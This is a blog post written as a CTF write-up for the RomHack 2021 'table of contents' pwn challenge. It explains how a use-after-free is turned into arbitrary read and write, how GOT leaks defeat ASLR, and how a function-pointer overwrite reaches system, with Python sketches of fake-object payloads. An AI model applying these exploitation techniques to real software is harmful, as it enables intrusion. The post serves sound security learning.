At Wuerth Phoenix, we recently introduced a security-focused guild, and decided to attend our first security CTF (Capture The Flag) challenge: RomHack CTF 2021.
After some initial panic (the challenges were really difficult!), we calmed down and managed to solve the ‘table of contents’ challenge in the ‘pwn’ category, which put our team in 21st place (!!) out of over 800 teams.
As with most ‘pwn’ challenges, the program we had to exploit was provided as a compiled binary executable, but no glibc binary came with it. This often means that you need to leak multiple addresses from the GOT (Global Offset Table) to identify the glibc version running remotely before you can exploit the vulnerability.
When running the exploitable binary, a menu is presented that lets you manage a library of books:
First I analyzed the binary and studied its functions with ghidra. It stood out to me that the program was written in C++ using OOP (Object Oriented Programming). There was a std::vector of Book objects. When donating a new book to the library, the add function was called:
I clearly saw that first the title is asked for (line 14), then the title is read from stdin (line 15), a new Book object is allocated (line 17) and then the new Book is pushed to a vector called items (line 23).
So what I understood was that the books are stored inside the items vector, and we can insert as many books as we want.
After studying the other functions, I noticed the fetch function and saw a strange detail in the decompiled code. The first part (which I omitted) asks for the index of the book, and the input is properly checked. But afterwards, if I chose to borrow the book:
The book is shallow-copied to another book entry called ‘borrowed’ (lines 54-85), then the book is freed from memory (line 89) and the memory address of the book object itself is printed back as the reference number of the book (line 93). And here we go! They did it wrong: they forgot to remove the book from the items vector and freed the book directly instead. That means that the freed book is still referenced by the vector and I can print it with the “list books” functionality.
I had clearly discovered a UAF (use after free) vulnerability here.
First I wanted to leak a couple of GOT addresses in order to find out which libc version was running on the remote machine and, once I knew that, overwrite some GOT entries or the free_hook. For this reason, the first thing I focused on was getting a read what where primitive that I could use for this purpose.
Creating a read what where primitive
So let’s take a look at how the memory of the objects is organized:
From Figure 4 I can see that items is a vector that contains the addresses of the Book objects. If I pick one Book object (the book with index 1 in the example) and dump its memory, I immediately see that at offset +0x8 (8 bytes) there is a pointer to a string that contains the title of the book (“BOOK2” in the example), and at offset +0x10 (16 bytes) I find the length of the title (5 characters in the example). With the “list books” functionality all titles are printed to the screen:
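To make the layout concrete, here is a minimal Python model of it. It only assumes the two offsets described above (+0x8 for the title pointer, +0x10 for the title length) and a 64-bit little-endian target. The helper names, the toy memory image and every address in it are made up for illustration and are not taken from the challenge binary.

```python
import struct

TITLE_PTR_OFFSET = 0x08  # pointer to the title string (from the dump above)
TITLE_LEN_OFFSET = 0x10  # length of the title in bytes (from the dump above)

def read_qword(memory: bytes, base: int, addr: int) -> int:
    """Read a little-endian 64-bit value stored at absolute address addr."""
    return struct.unpack_from("<Q", memory, addr - base)[0]

def list_title(memory: bytes, base: int, book_addr: int) -> bytes:
    """Mimic one 'list books' entry: follow the pointer, return `length` bytes."""
    ptr = read_qword(memory, base, book_addr + TITLE_PTR_OFFSET)
    length = read_qword(memory, base, book_addr + TITLE_LEN_OFFSET)
    start = ptr - base
    return memory[start:start + length]

# Toy memory image: all addresses below are hypothetical
BASE = 0x1000
memory = bytearray(0x100)
book_addr = BASE + 0x20
title_addr = BASE + 0x80
memory[0x80:0x85] = b"BOOK2"
# Store the title pointer at +0x8 and the title length at +0x10 of the book
struct.pack_into("<QQ", memory, 0x20 + TITLE_PTR_OFFSET, title_addr, 5)

title = list_title(bytes(memory), BASE, book_addr)
print(title)
```

In this model, whoever controls the pointer and the length controls which bytes end up on the screen.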
That means that if I can artificially craft a book with a title pointer pointing to a memory location I want to dump, I can dump any number of bytes of any location. Let’s further analyze the functionalities the program offers us. Let’s take a closer look at the ‘add_page’ functionality inside the “fetch” function:
Looking at the analyzed binary in ghidra, I noticed that the add_page function was part of the Book object itself:
I see that the size of the page is asked for and read from standard input (lines 12 and 13) and then exactly this size is allocated in memory (line 16). Then the content of the page is asked for (line 17) and read from stdin (line 18). At the end, the new page is pushed to the vector of pages of this book (line 19).
With this functionality, I can allocate an arbitrary heap chunk in memory (choosing size and content). Great! I can fake our book now!
So let’s first understand how big a Book object is:
The gdb gef plugin makes it easy to analyze the heap chunk allocated for a Book. Let’s again pick the same book as before, the second entry (index 1) of the items vector.
A Book object chunk has a size of 0x50 (80) bytes. Considering that 16 bytes are used by libc for the chunk metadata (see ‘X’ chars in Figure 9), we need to allocate 0x40 (64) bytes. Remembering the dump of a Book object (see Figure 4), the fake book is laid out as follows: first we copy the first 8 bytes of any other Book object to make it look like a legitimate Book (see ‘0x404290’ bytes in Figure 9); then we write the address (8 bytes, since we have a 64-bit executable) that points to the memory we want to leak (see ‘A’ chars in Figure 9); then the size of the dump we want to perform (8 bytes; we only want to leak one single address at a time, see ‘S’ chars in Figure 9); and finally filler bytes to fill up the entire allocation (40 bytes remaining, see ‘Z’ chars in Figure 9).
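The 64-byte layout described above can be sketched in Python as follows. This is a minimal sketch and not the original exploit code: the function name build_fake_book is my own, the first qword 0x404290 is the value mentioned for Figure 9, and 0x605eb0 is the printf GOT entry address reported in this write-up.

```python
import struct

BOOK_PAYLOAD_SIZE = 0x40  # 0x50 chunk size minus 16 bytes of allocator metadata
FIRST_QWORD = 0x404290    # first 8 bytes copied from a legitimate Book (Figure 9)

def build_fake_book(leak_addr: int, leak_size: int = 8) -> bytes:
    """Return 64 bytes: first qword, title pointer, title length, then filler."""
    header = struct.pack("<QQQ", FIRST_QWORD, leak_addr, leak_size)
    filler = b"Z" * (BOOK_PAYLOAD_SIZE - len(header))  # the 40 'Z' bytes
    return header + filler

PRINTF_GOT = 0x605eb0  # GOT entry of printf as reported in this write-up
fake_book = build_fake_book(PRINTF_GOT)
print(fake_book.hex())
```

Sent as the content of a 0x40-byte page, such a buffer is meant to land in the chunk freed by the borrow operation, so the stale entry in the items vector points at it.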
So finally the steps are:
For this purpose I wrote two functions: setup_heap, which executes Step 1 and Step 2, and read_arbitrary_address, which runs Step 3, Step 4 and Step 5:
We see that the GOT entry for the ‘printf’ function is located at 0x605eb0; leaking memory works flawlessly with this primitive:
We see the leaked memory instead of the title of BOOK3. The leaked bytes need to be reversed (because of the little endianness of the x86_64 architecture), and we can defeat ASLR (Address Space Layout Randomization) by leaking the printf function location:
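As a small illustration of the byte reversal, the following Python sketch decodes 8 leaked bytes as a little-endian address and derives a libc base from it. The sample bytes and the printf offset are invented for the example; the real offset depends on the glibc build running remotely, which is exactly what the leaks are meant to identify.

```python
def decode_leak(leaked: bytes) -> int:
    """Interpret up to 8 leaked bytes as a little-endian 64-bit address."""
    return int.from_bytes(leaked[:8], "little")

def libc_base(leaked_printf: int, printf_offset: int) -> int:
    """Subtract the symbol's offset inside libc from its leaked runtime address."""
    return leaked_printf - printf_offset

# Hypothetical values, not taken from the challenge
sample_leak = bytes.fromhex("10aee4f7ff7f0000")
HYPOTHETICAL_PRINTF_OFFSET = 0x64e10

printf_addr = decode_leak(sample_leak)
base = libc_base(printf_addr, HYPOTHETICAL_PRINTF_OFFSET)
print(hex(printf_addr), hex(base))
```

A base address that is not page-aligned (low 12 bits not zero) is a strong hint that the assumed libc version, and therefore the offset, is wrong.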
Creating a write what where primitive
Now that we have a read what where primitive, we need to create a write what where one. Analyzing the ‘return book’ functionality, we see that the program asks for the reference number that was given out when the book was borrowed. Looking at the code, we see that this number is treated as a direct memory location and the content of the borrowed book is written back to this location:
At line 11 an address is read from input, and at line 18 the content of the borrowed book is copied 1:1 to this location. Looking at the dump of a Book object in Figure 4, we remember that we control part of this memory through the title we give when donating a book. In fact, at offset Book+0x18 (24) we find the string of the title itself, which we control. So returning a book with the address we want to write to minus 0x18 (24) as the reference number writes the content of the title to that address.
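The offset arithmetic can be checked with a toy model in Python. The sketch below assumes that the whole 0x40-byte Book body is copied to the reference address; the function names, the memory image and all addresses are hypothetical.

```python
TITLE_OFFSET = 0x18  # the inline title string sits at Book+0x18
BOOK_SIZE = 0x40     # assumption: the full Book body is copied on return

def reference_for_write(target_addr: int) -> int:
    """Reference number to enter so that the title lands on target_addr."""
    return target_addr - TITLE_OFFSET

def simulate_return(memory: bytearray, base: int, reference: int, borrowed: bytes) -> None:
    """Toy model of 'return book': copy the borrowed Book to the reference address."""
    start = reference - base
    memory[start:start + len(borrowed)] = borrowed

# Hypothetical memory image and target
BASE = 0x2000
memory = bytearray(0x100)
target = BASE + 0x60
payload = (0xdeadbeefcafebabe).to_bytes(8, "little")  # bytes placed in the title

# Borrowed book: 0x18 bytes before the title, the title, then the rest
borrowed = bytes(TITLE_OFFSET) + payload + bytes(BOOK_SIZE - TITLE_OFFSET - len(payload))
simulate_return(memory, BASE, reference_for_write(target), borrowed)
print(memory[0x60:0x68].hex())
```

Note that in this model the copy also overwrites the 0x18 bytes in front of the target and the bytes after the title, which is one possible reason for crashes when aiming at sensitive locations.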
The idea worked pretty well, but trying to overwrite the free_hook pointer resulted in a strange memory access error (maybe a new security check built into newer glibc versions? I need to investigate this).
It was pretty late in the evening and I got really frustrated and decided to go to sleep.
Throw away almost everything and get RCE
During the break I remembered that I had seen the system function entry inside the GOT, which means that it’s used somewhere inside our program! So, searching for references to system, I immediately found a perfectly crafted function that helped with getting RCE (Remote Command Execution):
Looking at the constructor of the Book object, I saw that it inherits from the LibraryItem class. This means that if I can overwrite a function pointer that takes a string as its first parameter, with content that I’m in control of, I can achieve remote code execution! First I looked at the add_page function (see Figure 7), but it doesn’t accept any arguments. A few minutes later I realized that there’s another feature I haven’t explained yet, the feedback function, which simply clears out a string with zeroes:
If you compare the parameters of Book::feedback and LibraryItem::win, you will notice they are the same, and we can trigger the Book::feedback function through the leave_feedback function:
At lines 15-16 the index of the book is requested, then a new feedback of fixed size is allocated (line 19). A string is retrieved from stdin (line 22), the book object pointer is retrieved from the items vector (line 24), a function pointer is extracted from the Book object content at offset Book+0x28 (40) (line 27), the string is converted to a c_string (line 28) and then passed as an argument to the previously extracted function (line 29). You can see there are 2 arguments: the book and the string we asked for.
Now it was clear to me that if I put the address of LibraryItem::win instead of the address of Book::feedback into my fake book entry (at location self+0x28 (40)) and then added a feedback item to that fake book with an arbitrary command as feedback, system would be executed on this command!
Building the final exploit
So finally we needed to build a book that points to itself (the first 8 bytes of memory must be the address of the memory we are writing to) and has the address of the LibraryItem::win function (using ghidra it’s found at 0x401e30) at offset +0x28 (40):
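The shape of such a book can be sketched in Python like this. It is a sketch under assumptions, not the original exploit: the function name build_rce_book and the chunk address are hypothetical (the real address comes from the reference number printed when borrowing), while the win address 0x401e30 and the +0x28 offset are the ones given above.

```python
import struct

WIN_ADDR = 0x401e30         # LibraryItem::win, as found with ghidra
FEEDBACK_PTR_OFFSET = 0x28  # slot that normally holds Book::feedback
BOOK_PAYLOAD_SIZE = 0x40    # usable bytes of the 0x50 Book chunk

def build_rce_book(self_addr: int) -> bytes:
    """Fake Book whose first qword points to itself and whose +0x28 slot is win."""
    body = bytearray(b"Z" * BOOK_PAYLOAD_SIZE)
    struct.pack_into("<Q", body, 0x00, self_addr)
    struct.pack_into("<Q", body, FEEDBACK_PTR_OFFSET, WIN_ADDR)
    return bytes(body)

HYPOTHETICAL_CHUNK_ADDR = 0x1c6f2c0  # made-up heap address of the fake book
payload = build_rce_book(HYPOTHETICAL_CHUNK_ADDR)
print(payload.hex())
```

Once this payload occupies the freed Book chunk, leaving feedback on that entry should pass the feedback string to LibraryItem::win, and with it to system.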
We got remote code execution and retrieved the flag:
I hope you enjoyed my journey from starting the challenge to the final exploit! You can find the full exploit code on my GitHub repo.
Happy hacking!